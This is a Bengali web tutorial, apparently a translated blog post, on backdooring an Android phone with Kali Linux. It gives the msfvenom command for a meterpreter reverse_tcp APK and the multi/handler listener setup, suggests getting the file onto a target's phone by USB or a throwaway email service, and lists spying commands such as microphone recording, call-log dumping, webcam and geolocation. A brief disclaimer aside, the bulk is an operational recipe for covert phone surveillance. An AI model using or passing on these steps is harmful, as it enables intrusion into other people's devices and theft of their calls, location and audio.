কম্পিউটার
 Computer >> কম্পিউটার >  >> পদ্ধতি >> Linux

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

একটি অ্যান্ড্রয়েড স্মার্টফোন প্রায়ই বেশিরভাগ বাণিজ্যিক IoT গ্যাজেটের একটি গেটওয়ে। একটি Nest Smoke অ্যালার্ম একটি প্রাসঙ্গিক Android অ্যাপের মাধ্যমে ম্যানেজ করা হয়। তাই তাপমাত্রা নিয়ন্ত্রণ করার জন্য একটি নেস্ট থার্মোস্ট্যাট। স্মার্ট লক, ডোরবেল ক্যাম - প্রায় সমস্ত স্মার্ট ডিভাইস অ্যালেক্সা বা অন্যান্য মাস্টার অ্যাপ থেকে অ্যাক্সেস করা যেতে পারে। কেউ যদি এমন একটি অ্যান্ড্রয়েড ফোনে দূরবর্তী অ্যাক্সেস লাভ করে তবে কী হবে? আপনি কি এটা অসম্ভব মনে করেন? এর জন্য, আপনার অ্যান্ড্রয়েড ফোনে একটি ব্যাকডোর এন্ট্রি তৈরি করতে কীভাবে একটি কালি লিনাক্স "মেটাসপ্লয়েট" ব্যবহার করা যেতে পারে তার একটি প্রাথমিক ডেমো আমরা দেব৷

দ্রষ্টব্য :এই টিউটোরিয়ালটি নিরাপত্তা গবেষক এবং শখীদের জন্য। আমরা কারও অনুমতি ছাড়া তাদের ফোন হ্যাক করার পরামর্শ দিই না।

পটভূমি

আপনি কালি লিনাক্সে কাজ শুরু করার আগে, আপনাকে প্রথমে এর কনসোল টার্মিনালের সাথে নিজেকে পরিচিত করতে হবে।

এটি সহজেই সরঞ্জামগুলির একটি বিস্তৃত তালিকা হোস্ট করে যা একটি ডিভাইসের ফার্মওয়্যার বা অপারেটিং সিস্টেমকে লক্ষ্য করার জন্য ডিজাইন করা হয়েছে।

এখানে, আমরা একটি অ্যান্ড্রয়েড ফোনে ভাইরাস ঢোকানোর জন্য "MSFVenom" নামক একটি সাধারণ টুল ব্যবহার করব। এটি ব্যবহারকারীর নির্বাচিত বিকল্পগুলির উপর ভিত্তি করে একাধিক ধরণের পেলোড তৈরি করে। উইন্ডোজ, অ্যান্ড্রয়েড, ওপেনবিএসডি, সোলারিস, জাভা, পিএইচপি এবং গেমিং হার্ডওয়্যার সহ অনেক প্ল্যাটফর্ম জুড়ে শোষণ কাজ করে।

একটি Android Metasploit চালু করা হচ্ছে

নিচের ধাপগুলো দেখাবে কিভাবে একটি Kali Linux সিস্টেমে MSFVenom ডাউনলোড করতে হয়।

টার্মিনাল শুরু করুন এবং নিম্নলিখিত কমান্ডটি লিখুন।

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk

এখানে, "Meterpreter" নামক এক্সপ্লয়েট এক্সটেনশন ব্যবহার করে পেলোড চালু করা হয়।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

শ্রোতা হোস্টের IP ঠিকানা নির্ধারণ করতে, একটি নতুন কনসোল টার্মিনাল খুলুন এবং ifconfig লিখুন . সাধারণত, পোর্ট 4444 ট্রোজান, শোষণ এবং ভাইরাসের জন্য বরাদ্দ করা হয়।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

একবার আইপি ঠিকানা নির্ধারণ করা হয়ে গেলে, পূর্ববর্তী স্ক্রিনে ফিরে যান এবং বিশদ লিখুন।

"hackand.apk" ফাইলটি ডেস্কটপে সংরক্ষণ করা হবে এবং এটি অ্যান্ড্রয়েড ফোনে ব্যবহার করার জন্য প্রধান ব্যাকডোর শোষণ।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

পরবর্তী ধাপে, "msfconsole" চালু করুন যা কালি লিনাক্সের সাথে ব্যবহৃত একটি সাধারণ অনুপ্রবেশ পরীক্ষার সরঞ্জাম। এর জন্য, service postgresql start লিখুন msfconsole অনুসরণ করে . PostgreSQL একটি ডাটাবেস বোঝায় যেখানে কনসোল সংরক্ষণ করা হয়েছে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

একবার অনুপ্রবেশ টুল প্রস্তুত হলে, আপনি অবশিষ্ট শোষণ চালু করতে পারেন।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

এর পরে, "মাল্টি-হ্যান্ডলার" নামে একটি এক্সিকিউটেবল ব্যবহার করা হবে। 

use multi/handler

কনসোলের সাথে শোষণকে সংযুক্ত করার জন্য নীচের চিত্রটি পড়ুন। একই আইপি ঠিকানা এবং পোর্ট নম্বর ব্যবহার করা হবে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

পরবর্তী পর্যায়ে, msfvenom exploit চালু করা হবে এবং একটি সহজ exploit দিয়ে শুরু করা হবে। আদেশ এখন, আমাদের একটি লক্ষ্য খুঁজে বের করতে হবে যা একটি অ্যান্ড্রয়েড ফোন হবে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

অ্যান্ড্রয়েড ফোনের সাথে কালি লিনাক্স টার্মিনাল সংযোগ করা হচ্ছে

hackand.apk ফাইলটি আমরা আগে ডাউনলোড করেছি মাত্র 10 KB সাইজ। আপনাকে লক্ষ্যের ফোনে ফাইল সন্নিবেশ করার একটি উপায় খুঁজে বের করতে হবে। আপনি USB বা একটি অস্থায়ী ইমেল পরিষেবা ব্যবহার করে ভাইরাস স্থানান্তর করতে পারেন৷

সাধারণত, জিমেইল বা ইয়াহুর মতো ওয়েবমেইল প্রদানকারীরা এই ভাইরাস সংক্রমিত ফাইলটি বহন করতে অস্বীকার করবে।

আপনি সফ্টওয়্যার সন্নিবেশ করার আগে Android আপনাকে সতর্ক করবে। কিন্তু, ইনস্টলেশনটি সম্পূর্ণ করতে 20 সেকেন্ডেরও কম সময় লাগে কারণ আপনাকে শুধুমাত্র "ঝুঁকি উপেক্ষা করে ইনস্টল করতে হবে।" আপনার ফোন আনলক মোডে থাকলে এটি হুমকিকে কিছুটা গুরুতর করে তোলে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

এখানে দেখানো হয়েছে, স্টোরেজ বিষয়বস্তু পরিবর্তন করা, ফোনকে ঘুম থেকে রোধ করা, Wi-Fi থেকে সংযোগ ও সংযোগ বিচ্ছিন্ন করা, ওয়ালপেপার সেট করা এবং আরও অনেক কিছু সহ ফোনের অনেক ক্ষতি হতে পারে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

একবার APK ফাইলটি ইনস্টল হয়ে গেলে, এটি চালাকির সাথে ফোনের মধ্যে ছদ্মবেশ ধারণ করা যেতে পারে।

কালি লিনাক্স ব্যবহার করে কীভাবে একটি অ্যান্ড্রয়েড ফোন অ্যাক্সেস করবেন

এখন, আপনি ফোন নিয়ন্ত্রণ করতে কালি লিনাক্স টার্মিনালে নিচের মত অনেক কমান্ড ব্যবহার করতে পারেন। তালিকাটি একটি সাধারণ help থেকে পাওয়া যায় বলে আপনাকে সত্যিই সেগুলি মনে রাখতে হবে না meterpreter-এ বিকল্প .

  • record_mic :মাইক্রোফোন রেকর্ডিং
  • dump calllog :কল লগ পান
  • webcam_chat :একটি ভিডিও চ্যাট শুরু করুন
  • geolocate :ফোনের বর্তমান অবস্থান পান

সর্বাধিক উন্নত অ্যান্ড্রয়েড ফোনগুলি এই দূষিত অ্যাপটিকে ইনস্টল করা থেকে বাধা দেবে৷ সুতরাং, এই শোষণ সাধারণত পুরানো অ্যান্ড্রয়েড মডেলগুলির সাথে কাজ করবে৷

চিন্তা

এই টিউটোরিয়ালে, আমরা একটি অ্যান্ড্রয়েড স্মার্টফোনে অ্যাক্সেস পেতে কালি লিনাক্স ব্যবহার করার একটি প্রাথমিক কৌশল দেখেছি। যদিও এটি একটি খুব সাধারণ শোষণ, এটি আইওটি সুরক্ষার ক্ষেত্রে দুর্দান্ত প্রভাব ফেলে।

আপনি কালি লিনাক্স শোষণ সম্পর্কে কি মনে করেন? আপনি কি আপনার ফোনের নিরাপত্তা সম্পর্কে আরও সতর্ক হবেন? কমেন্টে আমাদের জানান।


  1. হোম রিমোট কন্ট্রোল অ্যাপ ব্যবহার করে অ্যান্ড্রয়েড ফোন থেকে উবুন্টু পিসি কীভাবে অ্যাক্সেস করবেন

  2. অ্যান্ড্রয়েড ফোনে ভয়েসমেল বার্তাগুলি কীভাবে অ্যাক্সেস করবেন

  3. কিভাবে অ্যান্ড্রয়েড ফোন রুট করবেন

  4. কিভাবে মোবাইল ফোন ব্যবহার করে আপনার দূরবর্তী ডেস্কটপ অ্যাক্সেস করবেন